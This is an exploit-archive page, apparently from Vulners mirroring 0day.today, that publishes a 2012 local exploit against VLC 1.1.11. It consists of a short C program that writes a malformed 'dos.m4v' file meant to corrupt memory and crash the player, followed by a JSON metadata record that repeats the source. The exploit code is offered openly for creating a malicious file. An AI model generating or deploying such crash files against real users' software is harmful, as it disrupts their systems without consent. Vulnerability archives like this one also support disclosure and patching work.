Search...

VLC v. 1.1.11 .m4v Memory Corruption

2012-03-14T00:00:00

ID 1337DAY-ID-17720
Type zdt
Reporter Dan Fosco
Modified 2012-03-14T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            # Exploit Title: VLC v. 1.1.11 .m4v Memory Corruption
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include &lt;stdio.h&gt;

int main()
{
	FILE *f;
	f = fopen("dos.m4v", "w");
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputs("\x66\x74\x79\x70", f);
	fclose(f);
	return 0;
}

//use code for creating malicious file



#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"hash": "14d0acd2c126fce4e11b1721bbb7ebc50def2ff5f1a85bd0498ee557085cab5d", "id": "1337DAY-ID-17720", "lastseen": "2018-01-05T07:13:24", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "320fe794d9edbbe662f93a51ca2dfa0c", "key": "href"}, {"hash": "43eceaac5a382b5a6a91d91f62dc2aaa", "key": "modified"}, {"hash": "43eceaac5a382b5a6a91d91f62dc2aaa", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f5ebea3e34388f6f6fa1ae226508f510", "key": "reporter"}, {"hash": "414d516753af784e8e1acebffb5bdb1c", "key": "sourceData"}, {"hash": "f0d3861367db7f0c158247247704d5ba", "key": "sourceHref"}, {"hash": "9be1469fa04aab893b7d33ecb5788d09", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 7.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17720", "description": "Exploit for windows platform in category local exploits", "title": "VLC v. 1.1.11 .m4v Memory Corruption", "history": [{"bulletin": {"hash": "12be53dac28f443c796f97d1302c063b45ddb0768d4aac97dc683e2813556d1f", "id": "1337DAY-ID-17720", "lastseen": "2016-04-20T02:16:57", "enchantments": {"score": {"value": 6.6, "modified": "2016-04-20T02:16:57"}}, "hashmap": [{"hash": "9be1469fa04aab893b7d33ecb5788d09", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "cf9ab0c3464ea92f4f5bd31981c46462", "key": "href"}, {"hash": "f5ebea3e34388f6f6fa1ae226508f510", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "53d89a3277fe211f72ddc7d9e0525fd7", "key": "sourceHref"}, {"hash": "70303aba90e6eae75ff82e091bf82dcc", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "43eceaac5a382b5a6a91d91f62dc2aaa", "key": "modified"}, {"hash": "43eceaac5a382b5a6a91d91f62dc2aaa", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17720", "description": "Exploit for windows platform in category local exploits", "viewCount": 0, "title": "VLC v. 1.1.11 .m4v Memory Corruption", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: VLC v. 1.1.11 .m4v Memory Corruption\r\n# Date: 3/14/2012\r\n# Author: Dan Fosco\r\n# Vendor or Software Link: www.videolan.org\r\n# Version: 1.1.11\r\n# Category:: local\r\n# Google dork: n/a\r\n# Tested on: Windows XP SP3 (64-bit)\r\n# Demo site: n/a\r\n\r\n#include <stdio.h>\r\n\r\nint main()\r\n{\r\n\tFILE *f;\r\n\tf = fopen(\"dos.m4v\", \"w\");\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputs(\"\\x66\\x74\\x79\\x70\", f);\r\n\tfclose(f);\r\n\treturn 0;\r\n}\r\n\r\n//use code for creating malicious file\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-03-14T00:00:00", "references": [], "reporter": "Dan Fosco", "modified": "2012-03-14T00:00:00", "href": "http://0day.today/exploit/description/17720"}, "lastseen": "2016-04-20T02:16:57", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: VLC v. 1.1.11 .m4v Memory Corruption\r\n# Date: 3/14/2012\r\n# Author: Dan Fosco\r\n# Vendor or Software Link: www.videolan.org\r\n# Version: 1.1.11\r\n# Category:: local\r\n# Google dork: n/a\r\n# Tested on: Windows XP SP3 (64-bit)\r\n# Demo site: n/a\r\n\r\n#include <stdio.h>\r\n\r\nint main()\r\n{\r\n\tFILE *f;\r\n\tf = fopen(\"dos.m4v\", \"w\");\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputs(\"\\x66\\x74\\x79\\x70\", f);\r\n\tfclose(f);\r\n\treturn 0;\r\n}\r\n\r\n//use code for creating malicious file\r\n\r\n\n\n# 0day.today [2018-01-05] #", "published": "2012-03-14T00:00:00", "references": [], "reporter": "Dan Fosco", "modified": "2012-03-14T00:00:00", "href": "https://0day.today/exploit/description/17720"}